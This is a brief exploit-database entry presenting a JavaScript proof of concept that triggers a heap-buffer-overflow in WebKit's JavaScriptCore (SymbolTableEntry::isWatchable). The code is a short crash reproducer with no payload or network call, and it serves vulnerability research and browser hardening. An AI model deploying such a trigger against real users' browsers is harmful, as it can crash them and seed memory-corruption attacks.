Exploit for WebKit: heap-buffer-overflow in JSC::SymbolTableEntry::isWatchable
Exploit Code
## https://sploitus.com/exploit?id=SSV:92919
(function (x = 0) {
var a;
{
function arguments() {
}
function b() {
var g = 1;
a[5];
}
f();
g();
}
}());